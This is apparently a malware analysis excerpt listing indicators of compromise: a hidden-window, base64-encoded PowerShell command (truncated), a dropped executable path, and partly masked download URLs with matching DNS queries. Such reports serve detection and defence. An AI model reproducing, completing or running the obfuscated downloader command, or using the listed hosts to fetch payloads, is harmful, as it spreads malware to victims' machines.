Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...
- %HOMEPATH%\p0btst0\n34vr3o\f3j2mdem1.exe
- http://da######ertecnologia.com.br/model/ULr/
- http://ol###aterlik.de/live/wjeos17/
- http://pi####ebymucha.de/Galerie/vo2uc9o42182780/
- http://st###n-els.de/cgi-bin/attach/GxmkA/
- http://si###yorange.de/_offset/AICNxQKBJmdw/
- http://sp###-kies.de/___backup/4c671x1sqjbux01284753/
- DNS ASK da######ertecnologia.com.br
- DNS ASK ol###aterlik.de
- DNS ASK pi####ebymucha.de
- DNS ASK st###n-els.de
- DNS ASK si###yorange.de
- DNS ASK sm####ksystems.ca
- DNS ASK sp###-kies.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...' (со скрытым окном)